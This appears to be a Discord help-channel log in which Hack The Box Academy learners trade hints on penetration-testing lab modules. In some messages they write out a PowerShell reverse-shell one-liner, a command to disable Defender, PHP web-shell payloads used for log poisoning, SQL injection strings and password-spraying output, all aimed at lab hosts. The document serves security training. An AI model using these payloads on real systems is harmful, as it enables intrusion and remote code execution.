Im still stuck on hacking wordpress module login.. so far i tried curl -X POST -d "<methodCall><methodName>system.listMethods</methodName><params><param><value><string>methodcall</string></value></param></params></methodCall>" http://46.101.14.23:30931/xmlrpc.php

and i got better results i think but im sure sure what a method call is

curl -X POST -d "{search:"system.listMethods"}" -H "Content-Type:application/json" http://46.101.14.23:30931/xmlrpc.php
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
<fault>
<value>
<struct>
<member>
<name>faultCode</name>
<value><int>-32700</int></value>
</member>
<member>
<name>faultString</name>
<value><string>parse error. not well formed</string></value>
</member>
</struct>
</value>
</fault>
</methodResponse>

url -X POST -d "<methodCall><methodName>system.listMethods</methodName><params><param><value><string>methodcall</string></value></param></params></methodCall>" http://46.101.14.23:30931/xmlrpc.php

anyone free for a nudge on the AD LDAP module? Stuck on finding members of the Pentest OU in the Enumerating Active Directory with Built-in Tools section

Hi Everyone, how you doing? In the final assesment of SQLMAP ESSENTIALS, I retrieve the table final_flag, but it content seems wrong, any help? Thanks in advance!!

I had this same issue last night. I went back and looked over the lesson and found different command you can aim at a service. I got the answer from it.

Thanks! I've used the -sV, version script, -sC, tcpdump, and ncat to try and enumerate the version. It's not one of those?

If it's the problem I'm thinking of, I'd look back over the netcat section.

Gotcha. I'll give it a shot tomorrow and let you know. Thanks

Hackthebox discord server is full of offsec fans and their employees who trying to bring Oscp everytime and come up with some try harder lol

I understand Life is hard and you have to try harder but 3 years of study and failed 5 times plus my friends also failed many times it makes me think

I mean people who working as a pentester in 2022-2021-2020-2019 could not pass oscp

In multiple tries

help with my curl questions? 😮

attacking wordpress login list the all the possible method calls

What's your question

http://165.227.224.62:32072/xmlrpc.php

oops

curl -X POST -d "<methodCall><methodName>system.listMethods</methodName></methodCall>" http://165.227.224.62:32072/xmlrpc.php

i need to find all the number of possible method calls

how do i grep it and list the method call mnumber?

Make a python script lol

;-;

im still learn python

Import os os.system("curl etc...")

whats that do? 😮

😄

dunno

you need to have at least one scripting lang good

Because you can automate many things faster

Sed grep awk those things are also important

Read this my bros it's inspiring

I prefer Ceh or some other companies instead of offsec

i agree i plan going back into that my odd getting me wanting to finish the hacking wordpress so my blue bar is all the way

Are u Doing htb modules?

academy ones yes

Allright, best of luck I can always be here to help (not always but always answers questions not on the server tho :()

.<

ahh thank you that worked. I see now that in some of the screen shots on the module page it showed that. Doh

Did anyone solve this :Repeat what you learned in this section to get a list of documents of the first 20 user uid's in /documents.php, one of which should have a '.txt' file with the flag.

List the module name and the section your working on.

it is called web attack ,the section name is Mass IDOR Enumeration and link is https://academy.hackthebox.com/module/134/section/1186

@wheat garden

it try to find txt in each uid's webiste,but i cant

I hadnt done that module yet

hi so still have no idea how to get all user from that OU but you can get all user and filter out the one in that OU (i don't think this is the intended way)

Hey anyone around did the File Upload - Whitelist? I've managed to upload files passed the filter but I can't seem to access the files in the directory, ||the files have a \ or //||. :C

the uploaded directory for that is the same as other section in ||/profile_images/||

It 404s whenever I try

Am I doing something wrong?

this module show you can bypass filter with just putting weird character in the payload name but i didn't have to do any of that and so far i have only see issue with that method

so that's the issue maybe?

Hmm lemme try the other method then

Worked. Thanks @vital adder

Module name: Shells&Payloads

Section name: Reverse Shell

Question: Connect to the target via RDP and establish a reverse shell session with your attack box then submit the hostname of the target box.

#Problem: The module gave me

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

and

PS C:\Users\htb-student> Set-MpPreference -DisableRealtimeMonitoring $true

But none of these code really work, i wonder what i do wrong

@wheat garden i think that have some problems

Use #starting-point

that link redirect to some google pay stuff on any run so a bit sussy for sure

hi guy i need some help with Active Directory LDAP - Skills question 6 (last question of the module) i can't find that target machine FQDN any where even with bloodhound or powerview never mind i'm F ing stupid

Attacking Common Services - Easy Please any hint.. i have tried but couldn't find any user credentials

[Shells & Payloads - The Live Engagement]
Hey Guys! Had anybody trouble after connecting to the foothold machine, interacting with the target machines?
Regarding academy's task 172.16.1.0/23 network would be the target, but looking at ifconfig there is a docker route to 172.17.1.0
The alleged target IP addresses 172.16.1.11, and 172.16.1.13 are both unreachable.
Command "route" hanging when called.
Any idea what's happening?

the have issue has been reported #858470491676737536 message

hint the first thing you need is ||smtp||

https://academy.hackthebox.com/module/39/section/414
METASPLOIT - Meterpreter

I just ran an nmap on the machine but the only program version I get is of IIS which in the tutorial is 6.0 and in the challenge 10.0

So far I've only found an exploit for 10.0 on vulnhub and it's paid

Am I supposed to attack another service than the module explains?

hint you got the right port but not the right service

@vital adder

nice

yes, i found that out but could find username.. then tried directory brute (hydra) found nothing.. and i'm wondering if that's from the word list

when using hydra did you use the full ||mail address|| as the username?

i used ||stmp-user-enum || but couldn't find any available username

oh sorry i miss read your first message my brain frieded after the Active Directory LDAP - Skill Assessment also yep you are using the right and did you use the given users.list

also you can pretty much the example command for that tool in the ||SMTP|| section

Hi,

What are your thoughts on sharing badges on your LinkedIN?

So far my LinkedIn is dusty and empty because I have nothing to brag (certs, etc) about yet.

Thanks!

By brag I mean show something to employers

It can definitely reflect positively on your progress. Also consider doing reflection blog posts and sharing a little about what you learned. Doing blogs can help improve writing skills and show your ability to write to an audience.

Yes, I been thinking about writing blogs too since I created my LinkedIn account and probably will most likely share badges that are not easy to get
Thanks!

Yes and you can share links to your blog posts via LinkedIn. Theres also a #community-content channel you could share in here in the HTB Discord.

I'm trying to install crackmapexec on a pwn box and I get

And when I run pip install -r requirements.txt it also bugs out

crackmapexec is already installed on the pwnbox, simply run it with cme

Hey can I get help on the file transfers module section Windows File Transfer Methods ? I'm a not sure to understand the question correctly Download the file flag.txt from the web root using wget from the Pwnbox. Submit the contents of the file as your answer.

If anyone can dm me it would be appreciated

Hi, I'm stuck on the assemsent skill in Intro to Assembly. Has anyone solved it? :))

Help with Internal Password Spraying - from Windows

Evil-WinRM PS C:\tools> Import-Module .\DomainPasswordSpray.ps1
Evil-WinRM PS C:\tools> Invoke-DomainPasswordSpray -Password Winter2022 -OutFile spray_success -ErrorAction SilentlyContinue
[] Now creating a list of users to spray...
[] There appears to be no lockout policy.
[] Removing disabled users from list.
[] There are 2940 total users found.
[] Removing users within 1 attempt of locking out from list.
[] Created a userlist containing 0 users gathered from the current user's domain
[] The domain password policy observation window is set to minutes.
[] Setting a minute wait in between sprays.

it just gets stuck here and freezes. It also does not generate a userlist. I could go in an make my own list from my last password spray i did with Kerbrute, but I am trying to get this to work the way it shows in the example.

I'm working through getting started module- privilege escalation and I have to connect to the root user. I already connected to user2 and copied the ssh key over to id_rsa file. When I try to ssh the root user, I get the message "Load key "id_rsa": invalid format", and a request for a password. My input looks like "ssh root@138.68.166.182 -p 32693 -i id_rsa". Why is the ssh key not recognizing? What am I doing wrong here?

i also did chmod 600 on the file

Someone can help me about ATTACKING ENTERPRISE NETWORKS - Post-Exploitation.
I run the dc_shell.exe but I there isn't incoming connection. I don't undestand:
I make 1 session with the first passage, I get the root on getuid.
I make a bg sessions and in the second session I make the step with set lhost 0.0.0.0.
But don't work.

Make sure you copied the whole key.

Thanks! I see what i was doing wrong. I wasn't copying over the BEGIN OPENSSH PRIVATE KEY and END OPENSSH PRIVATE KEY

Any someone give me a bit of hand with "attacking common services sql section" I got the hash but I can't find a password list that can crack it, I've tried the ones in the resources and rock you and all the ones in seclist/passwords/ but none in the sub directory from there. Am I on the right path or am I wasting my time?

@autumn garnet use rockyou.txt

Would you mind rewording your question please?

@placid quest I tried that and it came up exhausted

PM you

this shows up on every page for me now on academy, is that intended? I downloaded a new VPN file but it doesnt go away

Hi, everytime I connect via SSH to the target disposed to Section "Bind Shells" on "Shells and Payloads" for the exercies, the connection drops. I already changed my VPN file and it doesnt fix it. Suggestions?

try set your LHOST to the VPN IP, 0.0.0.0 might default to another interface

for me also... since a couple of days

Same. I'm doing attacking common applications and I thought it shows up because it deals with vhosts

cool, i guess it is a new feature/bug xD

Anyway, it's cool to see you learning here too. I just came across your youtube channel a few days ago and saved a few playlists to watch later

<@&861185840277487616>

mrok (832963964970598430) has been banned until 2022-11-23 15:51:36 (UTC).

beat me to it

Thanks 🙂

i did -_-

we know mto is chad

flexing my gains everyday sir

can someone give me a hand on this?

I want to ask

why the HTB machine accept http://165.227.224.62:32306/search.php?port_code=cn' UNION select 1,2,3,4-- - as url

But my Virtual machine/ Windows cannot run this url parameter

Has anyone find why the url encoding cannot be disable

Hello All ! Anyone did the IDOR exercise from the web attacks module lately? The application never sets a uid parameter in the url and if I set manually, the links to the files are removed from the response

Maybe if you provided more detail, such as the section and what exactly you've tried

Hey guys, i have a question about "Skills Assessment - Using Web Proxies". I´m not sure if i understand question 3 right. Do i fuzz the request for the login page, with the decoded cookie and fuzz the last character (and then encode the whole cookie)? Or do i understand it incorrectly?

Hey @lament tartan your YouTube channel 👌

thanks mate 🥰

if i have a question about one machine, it's the best place for help?

HTB or HTB Academy?

HTB

#boxes

ok thanks 😉

Unless there is a channel for that specific machine, then use that one

hello

https://academy.hackthebox.com/module/147/section/1391
Password Attacks - Password Mutations
I used the custom.rule in the module itself rather than the one attached in the resources but I still have 12655 options as pw..
This is going to take an eternity

Was able to solve this today! Thanks for the nudge!

Is there a way to run a metasploit module on a ssh session?

You should be able of setting up a metasploit listener and then sending a shell to it

I havent tried that myself yet though

good question! i would of done what Niux suggested but also can check: https://superuser.com/questions/1322515/meterpreter-on-ssh-connection

oh, you can just use ssh_login apparently: https://mysnippets443.wordpress.com/2020/03/09/metasploit-establish-a-ssh-session-for-further-use

Is there a way to drag and drop files on the pwnbox ? It doesnt seem to work for me

hmm it doesn't seem to be working for me

sessions

it doesn't like the session command

hang on gonna test now as well

fail I needed an s

was typing session

Can someone shoot me a hint for https://academy.hackthebox.com/module/147/section/1319

I've tried viewing the different files listed on the page, tried linpeas, tried running the exploits that linpeas mentioned and I got nada . >:c

@lament tartan how do u change the color of the terminal

right click > profile > profile preferences > colours

i have a "default" profile so i can quickly swap between them as some script outputs are colour coded (e.g. linpeas)

Great to hear!

Is there any way you can get the openvpn to boot up upon startup as its annoying rewriting the same code 50 times

@lament tartan thanks 😊

personally i put aliases in ~/.bash_aliases like alias vpn-academy='sudo openvpn --config /home/user/HTB-Academy.ovpn' so i can just type vpn-a and tab autocomplete. you could set it to run on startup but if you are switching between VPNs, e.g. academy, normal HTB, release arena it would probably be annoying

alright thank you

On the matter of coding what is a good source of knowledge for learning to code other than HTB as Im a noobie when it comes to coding as a whole

specifically assmebly code*

What do i learn before HTB

Just start with fundamental and easy level HTB content. As you discover your learning gaps start looking into IT fundamentals. Also feel free to ask questions in this channel as they arise.

Do i just use linux or kali?

Try starting with ParrotOS or Kali Linux both are awesome.

Maybe my last one for today, i also started python, should i do hackthebox and python together or only 1 thing

Hack The Box Academy actually has a python course. So you can learn both together within the context of security.

Is it a beginner course for those who never did python?

Maybe start with this path https://academy.hackthebox.com/path/preview/information-security-foundations

I'll start tomorrow i dont have any time atm

Thanks for helpijg

Helping*

https://academy.hackthebox.com/course/preview/introduction-to-python-3

Anytime

Hey everyone, can someone help me on Assembly's assessment (task 1) ?

hello

i need help

how to print environment variables?

i have tried env and printenv

Use what you learned in this section to obtain the flag which is hidden in the environment variables. Answer format: HTB{String}

This is from SSTI

I got RCE but I cant find the flag

@foggy light Do you get output from env and printenv?

yea

you can always give 'env | grep HTB' a shot

|| cat /usr/bin/printenv | grep HTB{ ||

this ?

Just as I wrote it

bruhhh

thanks

🙂

I have a question

when i just typed env it didnt showed anything?

why is that?

Just typing env should give you tons of info

just this...

😬

it is bugged ? or i should have tried something else

if you type '/usr/bin/env'

Does it also return almost empty?

yep same

Maybe someone else can tell you why 😓

Is anyone python savvy? Im trying to figure what "fline" means. It's specifically found in the basic brute force python script in broken auth module

LOL i wish i would have known this a long time ago

This is just a general question what is better Kali Linux or Parrot OS

Module Name: SQLMap Essentials

Section Name: Attack Tuning

Question 1: “What’s the contents of table flag5?”

Issue: The flag5 that is dumped from the table is incorrect as displayed and is not accepted when submitted.

Can someone help with this?

Sorted.... a '{' became a 'b'

Why isn't metasploit using the wordfile? All i get is this

these are my option settings. This isn't the wordfile i want to use but i wanted to try another one to see if that work. It worked once and about 20 entries it stopped and would never work again.

Hey i'm also stuck on the same skills assesment-Web and can't find the password also I tried with b.gates user but nothing it should took hours?

Someone is doing File Inclusion - Log Poisoning section?

How do I verify myself?

GET /index.php?language=/var/log/apache2/access.log%26cmd%3dpwd HTTP/1.1
Host: 178.62.99.223:32638
User-Agent: <?php system($_GET["cmd"]);?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=apm772lhdg911hgjdg2cgo5rj4
Upgrade-Insecure-Requests: 1
Sec-GPC:

I just tried to read cmd=pwd but I recieved 500 error code but If I tried to see Apache Log poisoning I was able to see on burpsuite 😕

http://ip/index.php?language=/var/log/apache2/access.log&cmd=pwd

what about using valid parameter first before directory traverse? such as language=en?/../../../../../var/log/somelogblahblah

If it can be poisoned, then if the ssh is enable, try to poison via ssh such as ssh '<?php system($_GET[cmd]);?>'@x.x.x.x and then try language=....&cmd=somecommandblahblah again.

can anyone help on Advanced Command Obfuscation question of Command Injection Module?

never mind, figured it out

how do i connect to the vpn in my terminul

what line do i run

im trying to serf the web and its not working

hello hacks！

is there a channel to ask for help on box

#boxes

I’m a total noob so pls go easy. Also lemme know if there’s a more appropriate place to ask this. I’m trying to find open ports on my live boot of parrot connected to my home wifi with google open and a video playing on another website. I did nmap -sV -sC -p- [ip address here] and it says all ports are closed. How is this possible with google open and a video playing? Or what am I doing wrong?

Please move to #red-team. This room is for academy modules

https://academy.hackthebox.com/module/147/section/1391
Password Attacks - Password Mutations

I've divided up the mut_password.list into multiple files and am slowly aiming them at ftp at 48 threads but I was wondering what the maximum amount of threads I can run is (Want to accelerate the process)

@mellow sparrow ports maybe closed or are due to firewall in the place that is blocking the scanning

Oh sorry I am on the “Getting Started” module under “Service Scanning” section. I’ll make sure to include that going forward

Ah, apologies, carry on 😂

Interesting. Thanks for that bit. I’ll keep exploring. Was thinking I did something wrong.

Is there some tool or method to scan how many concurrent threads the server can handle?

Hi everyone !
I am currently working on Active Directory Enumeration & Attacks
During all the exercices I have issues RDP into the hosts.
When I don't have an auth error, xfreerdp is stuck on a blackscreen.

What troubles me, is that non of those issues appear when using the attack box.

Does someone faced the same issues ?

Weird question but how do you get that msf prompt and colours? Mine is just msf6 MODULE >
I tried looking online but haven't found any official sources on how the metasploit prompt works

hmmm for prompt maybe check what version shows when you launch (i'm on v6.2.22-dev). the colours is just from my terminal colour scheme

note that my colours aren't very practical, i chose purely because i like the appearance but quite often swap to default profile for more useful colours where tool output requires

I'm on 6.2.23-dev
The only thing related to prompts I found is https://malicious.link/post/2011/2011-10-09-msfconsole-prompt-fiddling/, but it doesn't show anything about colours.
I don't think the colours of the jobs and agent strings are part of the terminal, since they're from the prompt

Also I found out there's options if you have no module, could you show me yours?

looks like you're on kali? i'm using parrot so different terminal i guess

if i change to default colour profile it looks like this:

instead of this

Can I DM someone regarding the File Upload Attacks /Whitelist Filters?

Yep, I'm on kali. I'll definitely give parrot a try once I'm done with OSCP, it seems promising. Also since the htb team likes it I assume it can't be bad

I'll look more into the msf prompt settings, I'll let you know if I find the colour settings

You could ask here

@solar granite I have the same issue as mdolores here. I tried some extensions that worked (file successfully uploaded) but get the Not Found error:

I'll DM you, can't help without spoiling others

Paddon with the parrot pfp but no parrot os

smh

@lament tartan I found out how to set colours for the msf prompt: set PROMPT %red%A %yel%B %grn%C %blu%D. There's also white with %whi%

I had this pfp way before I even knew about parrot os haha. Just a coincidence really

😛

hi everyone 😄

Im working on the Attacking Common Services SMB Section. I think I have the right password list... but im not sure. CME isnt showing any hits, SMB_Login msf module is returning an error about encryption, and hydra is giving an error when trying smbv2. kinda lost here lol any help would be greatly appreciated

@solar zodiac use xhydra maybe

I've never tried xhydra. I'm doing something wrong here 😦 Im getting an error about encryption. Is there anyone I can dm :D?

i cant able to curl this url https://www.inlanefreight.com showing **curl: (6) Could not resolve host: www.inlanefreight.com
**

any one facing this issue in htb academy module linux fundamentals

@tender jasper use -k

i have used curl -k https://www.inlanefreight.com -o test.txt but facing same issue @placid quest

@tender jasper certificate

what certificate @placid quest

@tender jasper because it is https

do i need to add anything @placid quest

No just -k yo ignore certificate

i tried **curl: (6) Could not resolve host: www.inlanefreight.com
** but same result @placid quest

i think this host is not working in htb academy @placid quest

Ok

Add it to /etc/hosts

Need help with Command Injection Skills Assessment. I keep getting Malicious request denied.

Hint: ||try a different command||

hi so,

what am I doing wrong

I have active vpn

try \\\\<ip>\\

or //<ip>/

also check if the host is reachable

you mean instead of ||trying to move the file, just try to cat it out||

still nothing

ok disabled firewall

lmao

Not really. I didn't know you're trying to move the file, you didn't mention what you're trying to do initially

i was thinking since ||we can move files, maybe move the file to tmp and then try to read it from there||

which kali should i download

For people having the same issues while working on the Active Directory module

Use this command : xfreerdp /u:'htb-student' /p:'Academy_student_AD!' /v:10.129.149.125 /cert:ignore /gfx:rfx

It seems that the hosts have some issues with gfx

What is the name of one of the accessible SMB shares from the authenticated Windows scan? (One word).. how do i get to the authenticated report

Hi, im new at this . Can someone help me?

What software do people use for creating the HTB Bug Bounty Hunter certification report?

quit

Anyone mind providing some guidance on the module Linux Privilege Escalation - Privileged Groups? I understand I am suppose to grep the directory /var/log as the user secaudit since this user is apart of the adm group. However, I am wondering how to impersonate/escalate to this user. I see the steps used to abuse LXD container functionality to get escalation. Any help or advice is appreciated.

Hey guys,

I’m stuck on Password Attacks - Password Reuse / Default Passwords - "Use the user’s credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer.

My question is, are we suppose to SSH into sam’s host and dig around for credentials? I’ve tried searching into config files, ssh keys, etc, but am getting permission errors.

Or are we suppose to use credential stuffing ( hydra -C <user_pass.list> ://) using a file with user:pass as explained in the module ? I created a file with sam, kira, will and default sql usernames. So for every line in the file I have sam:pass. kira:pass, root:pass. admin:pass etc. (pass being Sam’s password discovered in previous module) I mutated this list using rules and then tried to use Hydra with no success. Am I completely missing the ball on this one? Any guidance is appreciated.

@shy warren Just check the default password cheat list

https://github.com/ihebski/DefaultCreds-cheat-sheet/blob/main/DefaultCreds-Cheat-Sheet.csv

the cred for that section is ||in one of the link||

completely fumbled the ball on this one... Thanks yall!

i have nothing in my note about getting any user, all i have in my note is if you run id and and the your user is in the a group named ||adm|| then you are on the right user

if you are in the Vulnerability Assessment module then look for the smb that ||doesn't have password protect ||

if you still need help then one of the method you can use is the ||base64|| one and also you can only read the flag when you got RCE

I am having trouble with the pivoting module. Specifically I am trying to set up a socks proxy through meterpreter and also being able to use proxychains and see a network within a network. Any help?

so are you having issue setting that up?

is it possible to download the iso that hackthebox is using on the virtual servers?

the pwnbox?

correct

@vital adder I realized now why when I first did that, it didn't work. I ssh'ed in as htb-student user and not as secaudit user.

@vital adder is it possible?

Thank you for your help!

@bright ridge the pwnbox is basically just a custom htb them version of parrot os, check the github pin message in #710108839063846964 i that show you how to "install pwnbox" on your parrot os

@bright ridge https://github.com/theGuildHall/pwnbox

yes but #modules message

There is no official version

So you have to google around for scripts that give you the 'look and feel' of a pwnbox

i see thanks

for the last machine it don't have the firewall on so you can still ping it but a ping sweep only work half of the time for me for some reason so i recommend a gui tool call netwatcher

Hey. Did you solve it?

no one help nice comunity

it would be easier for us to help if you say what's your issue is

@fluid yoke Try starting with a more concise question..

If you're looking for a place to start head over to the academy and sort the modules on Fundamental // Tier 0

Do you guys think its a good idea for a 15 year old to enroll in HTB's penetration testing cert & course

@elfin nacelle do u have experience before u do pentestration testing cert

if you willing to put in effort then yep

Well I would go through all the modules and practice etc, I have some prior experience with programming (idk how much that helps). Python, C, Lua etc. I've used tools like burpsuite before

unfortunately not a lot but it will help (but burp will)

I may try

if you are a complete beginner i recommend tryhackme

it's more beginner friendly

Beginner to what tho

to cyber security in general

oh wait you are in tryhackme

Yea I am. I might do both tbh but I liked HTB more with its learning style

yep do both

Only problem is money 🤣 I am broke af

Can't even afford the student discount

tryhackme subscription is 2 dollars more expensive but you will get access to all 500 room and the unlimited attack box (thm pwnbox)

@elfin nacelle If you're new to linux you could always look at the overthewire challenges

But they might be too easy if you've done some previous stuff

oh yeah forgot the ping but this is for you if you are looking for the last target #modules message

oh

hint ||the flag is on the share drive||

Hi! Could anybody help me with xss session hijacking? i've completed everything else in the module, but i just don't know which payload should be used to verify the place for the vulnerable input

wait what auth? if you are on the domain controller you are just get the flag in the ||share drive|| without any cred

oh then that's not the last machine ohh you are having issue finding the cred for DC sorry i'm dumb

yep

so did you get the user (named start with an v) with mimikatz?

if so then the cred for that user in somewhere in the bottom of the dump

if you output it into a file it's way more easier to get the password

also hint the ||password is in clear text||

yep i think that's what you you supposed to do

Hello I need help on section Passwords Attack Lab -Easy of Password Attacks module, I put a lot of time in this one and I still can't manage to pass.

So there are 2 ports open on this machine which are SSH 22 and FTP 21 and
I tried to force FTP protocol with the mutated password list I crafted and username list provided in resources and I waited 1 hour it doesn't find.
I tried a lot of combination (surely not enough), I also tried to list words of 6 characters in inlanefreight.com website and make a password list with it (even mutated).

I appreciate your help thanks !

so after making the php and js file like in the example the payload you can use have some stuff in front of the payload (oh hint the right payload is one the payload under ||Loading a Remote Script||)

i think have the old wordlist of this module but hint you don't need a ||mutated list|| for this lab

and also i think you are on the right path but not the ||right wordlist||

i just download the new one and it doesn't matter

Thank you MRtom ! I will try with your hints, good luck on your steps as well

oh i finish this module a while back

I use the password attack wordlist given in the module

yep that's the one

Ok so i'm trying hydra on FTP without any mutated password

i think they update the wordlist some time ago (they just change some stuff in it)